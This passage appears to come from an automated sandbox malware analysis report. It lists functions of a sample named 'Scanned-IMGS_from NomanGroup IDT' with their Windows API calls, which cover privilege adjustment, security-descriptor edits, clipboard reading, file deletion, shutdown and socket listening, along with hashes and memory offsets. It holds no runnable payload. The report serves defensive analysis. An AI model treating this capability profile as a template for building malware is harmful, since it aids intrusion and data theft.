                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
                                                                                • String ID: $default$winsta0$ZQ
                                                                                • API String ID: 22674027-4020664062
                                                                                • Opcode ID: 43c8438cab20dc8d7304284673218b3cba4724e0f5347c05abbb01c8dac50bbe
                                                                                • Instruction ID: 80187f8af2834ab8bfdff2b17d24ae08020c9ca974ba784fa4a042a3121954f1
                                                                                • Opcode Fuzzy Hash: 43c8438cab20dc8d7304284673218b3cba4724e0f5347c05abbb01c8dac50bbe
                                                                                • Instruction Fuzzy Hash: 0481A071900249AFDF209FA8DC99FEF7BB9EF04704F14412AF910A62A1D7398945CB29
                                                                                Function 004B0B62 Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 004B10F9: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 004B1114
                                                                                  • Part of subcall function 004B10F9: GetLastError.KERNEL32(?,00000000,00000000,?,?,004B0B9B,?,?,?), ref: 004B1120
                                                                                  • Part of subcall function 004B10F9: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,004B0B9B,?,?,?), ref: 004B112F
                                                                                  • Part of subcall function 004B10F9: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,004B0B9B,?,?,?), ref: 004B1136
                                                                                  • Part of subcall function 004B10F9: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 004B114D
                                                                                • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 004B0BCC
                                                                                • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 004B0C00
                                                                                • GetLengthSid.ADVAPI32(?), ref: 004B0C17
                                                                                • GetAce.ADVAPI32(?,00000000,?), ref: 004B0C51
                                                                                • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 004B0C6D
                                                                                • GetLengthSid.ADVAPI32(?), ref: 004B0C84
                                                                                • GetProcessHeap.KERNEL32(00000008,00000008), ref: 004B0C8C
                                                                                • HeapAlloc.KERNEL32(00000000), ref: 004B0C93
                                                                                • GetLengthSid.ADVAPI32(?,00000008,?), ref: 004B0CB4
                                                                                • CopySid.ADVAPI32(00000000), ref: 004B0CBB
                                                                                • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 004B0CEA
                                                                                • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 004B0D0C
                                                                                • SetUserObjectSecurity.USER32(?,00000004,?), ref: 004B0D1E
                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004B0D45
                                                                                • HeapFree.KERNEL32(00000000), ref: 004B0D4C
                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004B0D55
                                                                                • HeapFree.KERNEL32(00000000), ref: 004B0D5C
                                                                                • GetProcessHeap.KERNEL32(00000000,00000000), ref: 004B0D65
                                                                                • HeapFree.KERNEL32(00000000), ref: 004B0D6C
                                                                                • GetProcessHeap.KERNEL32(00000000,?), ref: 004B0D78
                                                                                • HeapFree.KERNEL32(00000000), ref: 004B0D7F
                                                                                  • Part of subcall function 004B1193: GetProcessHeap.KERNEL32(00000008,004B0BB1,?,00000000,?,004B0BB1,?), ref: 004B11A1
                                                                                  • Part of subcall function 004B1193: HeapAlloc.KERNEL32(00000000,?,00000000,?,004B0BB1,?), ref: 004B11A8
                                                                                  • Part of subcall function 004B1193: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,004B0BB1,?), ref: 004B11B7
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                • String ID:
                                                                                • API String ID: 4175595110-0
                                                                                • Opcode ID: 8051f232667d2b1c636ba609bf5125dc004926a9468042665580faad421abac5
                                                                                • Instruction ID: 84c0d3e561b2faf048b98a153b64ff1e2ae3372fd14ba70e1a0b2b96bff2002a
                                                                                • Opcode Fuzzy Hash: 8051f232667d2b1c636ba609bf5125dc004926a9468042665580faad421abac5
                                                                                • Instruction Fuzzy Hash: 66715E7190020AABDF10DFE4DC84BEFBBBCBF05301F044526E915AA291D779AA06CB74
                                                                                Function 004CEAFF Relevance: 30.2, APIs: 20, Instructions: 191clipboardfileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • OpenClipboard.USER32(004ECC08), ref: 004CEB29
                                                                                • IsClipboardFormatAvailable.USER32(0000000D), ref: 004CEB37
                                                                                • GetClipboardData.USER32(0000000D), ref: 004CEB43
                                                                                • CloseClipboard.USER32 ref: 004CEB4F
                                                                                • GlobalLock.KERNEL32(00000000), ref: 004CEB87
                                                                                • CloseClipboard.USER32 ref: 004CEB91
                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 004CEBBC
                                                                                • IsClipboardFormatAvailable.USER32(00000001), ref: 004CEBC9
                                                                                • GetClipboardData.USER32(00000001), ref: 004CEBD1
                                                                                • GlobalLock.KERNEL32(00000000), ref: 004CEBE2
                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 004CEC22
                                                                                • IsClipboardFormatAvailable.USER32(0000000F), ref: 004CEC38
                                                                                • GetClipboardData.USER32(0000000F), ref: 004CEC44
                                                                                • GlobalLock.KERNEL32(00000000), ref: 004CEC55
                                                                                • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 004CEC77
                                                                                • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 004CEC94
                                                                                • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 004CECD2
                                                                                • GlobalUnlock.KERNEL32(00000000), ref: 004CECF3
                                                                                • CountClipboardFormats.USER32 ref: 004CED14
                                                                                • CloseClipboard.USER32 ref: 004CED59
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                                                                                • String ID:
                                                                                • API String ID: 420908878-0
                                                                                • Opcode ID: 6ccc6664e9cc555a3de724c3eaac5b2c5c1b7802a52325c7f06ba5e22825c892
                                                                                • Instruction ID: 4387b5da88312b5bc649576bb63ed40e9cff92d0fa32ab8da935c6df2dbf6b74
                                                                                • Opcode Fuzzy Hash: 6ccc6664e9cc555a3de724c3eaac5b2c5c1b7802a52325c7f06ba5e22825c892
                                                                                • Instruction Fuzzy Hash: F861C4381043419FD310EF26C8C5F3A77A4AF84714F14456EF9568B2A2DB39ED0ACB6A
                                                                                Function 004C698F Relevance: 21.4, APIs: 7, Strings: 5, Instructions: 363timefileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 004C69BE
                                                                                • FindClose.KERNEL32(00000000), ref: 004C6A12
                                                                                • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 004C6A4E
                                                                                • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 004C6A75
                                                                                  • Part of subcall function 00459CB3: _wcslen.LIBCMT ref: 00459CBD
                                                                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 004C6AB2
                                                                                • FileTimeToSystemTime.KERNEL32(?,?), ref: 004C6ADF
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                                                                                • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                                                                • API String ID: 3830820486-3289030164
                                                                                • Opcode ID: 54c95e31f828f37ce52f3c51f47112846ecb92f70a4ce19f120f3404ee0a4a2c
                                                                                • Instruction ID: 27f761ee1ba1b5a94de91e4efc8cf90f5fdf66fa3f25dc4024fc98497436eade
                                                                                • Opcode Fuzzy Hash: 54c95e31f828f37ce52f3c51f47112846ecb92f70a4ce19f120f3404ee0a4a2c
                                                                                • Instruction Fuzzy Hash: B7D177725083409FC310EBA5D881EAFB7ECAF88705F44491EF985C7192EB79DA48C766
                                                                                Function 004C9642 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 118fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 004C9663
                                                                                • GetFileAttributesW.KERNEL32(?), ref: 004C96A1
                                                                                • SetFileAttributesW.KERNEL32(?,?), ref: 004C96BB
                                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 004C96D3
                                                                                • FindClose.KERNEL32(00000000), ref: 004C96DE
                                                                                • FindFirstFileW.KERNEL32(*.*,?), ref: 004C96FA
                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 004C974A
                                                                                • SetCurrentDirectoryW.KERNEL32(00516B7C), ref: 004C9768
                                                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 004C9772
                                                                                • FindClose.KERNEL32(00000000), ref: 004C977F
                                                                                • FindClose.KERNEL32(00000000), ref: 004C978F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                                • String ID: *.*
                                                                                • API String ID: 1409584000-438819550
                                                                                • Opcode ID: 2da0c42a2aa24b5aeb801155dcaf83df27203e075a3a98be7b2d31bd36c6f14b
                                                                                • Instruction ID: b0c6c012d73af37984bd83260711e276165f766bd91c498298abc9f667b3d525
                                                                                • Opcode Fuzzy Hash: 2da0c42a2aa24b5aeb801155dcaf83df27203e075a3a98be7b2d31bd36c6f14b
                                                                                • Instruction Fuzzy Hash: 5631D236642249BADB10AFB5DC8DFDF37ACAF09320F1040AAE914E6191DB78DD418A1C
                                                                                Function 004C979D Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 111fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 004C97BE
                                                                                • FindNextFileW.KERNEL32(00000000,?), ref: 004C9819
                                                                                • FindClose.KERNEL32(00000000), ref: 004C9824
                                                                                • FindFirstFileW.KERNEL32(*.*,?), ref: 004C9840
                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 004C9890
                                                                                • SetCurrentDirectoryW.KERNEL32(00516B7C), ref: 004C98AE
                                                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 004C98B8
                                                                                • FindClose.KERNEL32(00000000), ref: 004C98C5
                                                                                • FindClose.KERNEL32(00000000), ref: 004C98D5
                                                                                  • Part of subcall function 004BDAE5: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 004BDB00
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                                • String ID: *.*
                                                                                • API String ID: 2640511053-438819550
                                                                                • Opcode ID: bc0e12e4bc506031b917bc60dd507191afe94ca3711b947f148b9bb2a5b12ff8
                                                                                • Instruction ID: b1f67eab47be401b424b2b7f473c20a2d37474f0fb22a4fb3a211bdc455b2807
                                                                                • Opcode Fuzzy Hash: bc0e12e4bc506031b917bc60dd507191afe94ca3711b947f148b9bb2a5b12ff8
                                                                                • Instruction Fuzzy Hash: 8931F2365002597ADB10BFA5DC88FDF37ACAF06320F1040ABE814A7191DB79DE858A2C
                                                                                Function 004C8195 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 186timeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetLocalTime.KERNEL32(?), ref: 004C8257
                                                                                • SystemTimeToFileTime.KERNEL32(?,?), ref: 004C8267
                                                                                • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 004C8273
                                                                                • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 004C8310
                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 004C8324
                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 004C8356
                                                                                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 004C838C
                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 004C8395
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: CurrentDirectoryTime$File$Local$System
                                                                                • String ID: *.*
                                                                                • API String ID: 1464919966-438819550
                                                                                • Opcode ID: 4fd44a17f2c10b618b28f81fb897cc6337bf34a4acf5f3deb6db43d4f22587fd
                                                                                • Instruction ID: 24318ae7799a4ef7fe442e119dca1f2e9a672b918253c76d4005aa9f359a05fc
                                                                                • Opcode Fuzzy Hash: 4fd44a17f2c10b618b28f81fb897cc6337bf34a4acf5f3deb6db43d4f22587fd
                                                                                • Instruction Fuzzy Hash: B6616C765043459FC710DF61C884E9FB3E8FF89314F04482EE98987251EB39E945CB9A
                                                                                Function 004BD076 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 172fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00453AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00453A97,?,?,00452E7F,?,?,?,00000000), ref: 00453AC2
                                                                                  • Part of subcall function 004BE199: GetFileAttributesW.KERNEL32(?,004BCF95), ref: 004BE19A
                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 004BD122
                                                                                • DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 004BD1DD
                                                                                • MoveFileW.KERNEL32(?,?), ref: 004BD1F0
                                                                                • DeleteFileW.KERNEL32(?,?,?,?), ref: 004BD20D
                                                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 004BD237
                                                                                  • Part of subcall function 004BD29C: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,004BD21C,?,?), ref: 004BD2B2
                                                                                • FindClose.KERNEL32(00000000,?,?,?), ref: 004BD253
                                                                                • FindClose.KERNEL32(00000000), ref: 004BD264
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
                                                                                • String ID: \*.*
                                                                                • API String ID: 1946585618-1173974218
                                                                                • Opcode ID: 7105d1315b6f9b71f79a15071610cd7a81bcc2035eb7fb4b6682536ec7614e2b
                                                                                • Instruction ID: 3e122dfedb31334ef68147101656a71b0f0b9b09b716c92871cef17196c734df
                                                                                • Opcode Fuzzy Hash: 7105d1315b6f9b71f79a15071610cd7a81bcc2035eb7fb4b6682536ec7614e2b
                                                                                • Instruction Fuzzy Hash: 39618F31C0114DABCF05EBE1C9929EEB7B5AF14349F2445AAE80177192EB385F09CB69
                                                                                Function 004CED6A Relevance: 13.6, APIs: 9, Instructions: 102clipboardmemoryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                • String ID:
                                                                                • API String ID: 1737998785-0
                                                                                • Opcode ID: 059725b64950bf021acdca1b536b90dd46f8b684641803bf3f0c54e36c2b2fc3
                                                                                • Instruction ID: d1346c0e0acd8338594eab01eeccdd8b9ba67261ac9c6b35e22311df28789b76
                                                                                • Opcode Fuzzy Hash: 059725b64950bf021acdca1b536b90dd46f8b684641803bf3f0c54e36c2b2fc3
                                                                                • Instruction Fuzzy Hash: 6141AF356046519FD720DF26D888F1ABBA1EF44358F14C0AEE8168F762C739EC42CB98
                                                                                Function 004BE8F6 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 57shutdownCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 004B16C3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 004B170D
                                                                                  • Part of subcall function 004B16C3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 004B173A
                                                                                  • Part of subcall function 004B16C3: GetLastError.KERNEL32 ref: 004B174A
                                                                                • ExitWindowsEx.USER32(?,00000000), ref: 004BE932
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                • String ID: $ $@$SeShutdownPrivilege
                                                                                • API String ID: 2234035333-3163812486
                                                                                • Opcode ID: a48248148d6e9c16577045fd73f6d6d86b56b81a45c31634856517656fb3deeb
                                                                                • Instruction ID: b4beff9fbbc8cd6841ef76631241402f34a9831dabd9342a5a74fa07c82e3b1b
                                                                                • Opcode Fuzzy Hash: a48248148d6e9c16577045fd73f6d6d86b56b81a45c31634856517656fb3deeb
                                                                                • Instruction Fuzzy Hash: 2101F2B2610210EFEB1826B69CC6BFB729CA744744F140823F812E21E2D5A85C4982BC
                                                                                Function 004D1204 Relevance: 12.1, APIs: 8, Instructions: 113networkCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 004D1276
                                                                                • WSAGetLastError.WSOCK32 ref: 004D1283
                                                                                • bind.WSOCK32(00000000,?,00000010), ref: 004D12BA
                                                                                • WSAGetLastError.WSOCK32 ref: 004D12C5
                                                                                • closesocket.WSOCK32(00000000), ref: 004D12F4
                                                                                • listen.WSOCK32(00000000,00000005), ref: 004D1303
                                                                                • WSAGetLastError.WSOCK32 ref: 004D130D
                                                                                • closesocket.WSOCK32(00000000), ref: 004D133C
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLast$closesocket$bindlistensocket
                                                                                • String ID:
                                                                                • API String ID: 540024437-0
                                                                                • Opcode ID: 786129bf9f6506b58d3906e5842413769ab6c311ae6ee4b62470894708045bf1
                                                                                • Instruction ID: a3915bad7cf9833c258eb960c62c1bc0afff38cbc6c6ff8785776dfca34f0dc6
                                                                                • Opcode Fuzzy Hash: 786129bf9f6506b58d3906e5842413769ab6c311ae6ee4b62470894708045bf1
                                                                                • Instruction Fuzzy Hash: 82418F31600140AFD714DF64C5D8A2AB7E5AB46318F18819ADC569F3A3C735EC86CBA5
                                                                                Function 004BD3A9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 00453AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00453A97,?,?,00452E7F,?,?,?,00000000), ref: 00453AC2
                                                                                  • Part of subcall function 004BE199: GetFileAttributesW.KERNEL32(?,004BCF95), ref: 004BE19A
                                                                                • FindFirstFileW.KERNEL32(?,?), ref: 004BD420
                                                                                • DeleteFileW.KERNEL32(?,?,?,?), ref: 004BD470
                                                                                • FindNextFileW.KERNEL32(00000000,00000010), ref: 004BD481
                                                                                • FindClose.KERNEL32(00000000), ref: 004BD498
                                                                                • FindClose.KERNEL32(00000000), ref: 004BD4A1
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                                • String ID: \*.*
                                                                                • API String ID: 2649000838-1173974218
                                                                                • Opcode ID: 8c4fc92259796b046bc49d22e4ec9385a3124887679fb174d80b39d8cbb4ba78
                                                                                • Instruction ID: d5987a9379fa5960cb842f7100376f2716bdd8c533847bdad5d5cb8dcf0319d1
                                                                                • Opcode Fuzzy Hash: 8c4fc92259796b046bc49d22e4ec9385a3124887679fb174d80b39d8cbb4ba78
                                                                                • Instruction Fuzzy Hash: D23170714083859BC300EF65C8918EF77E8AE91355F444E6EF8D153192EB38AA0EC76B
                                                                                Function 0048E4FF Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
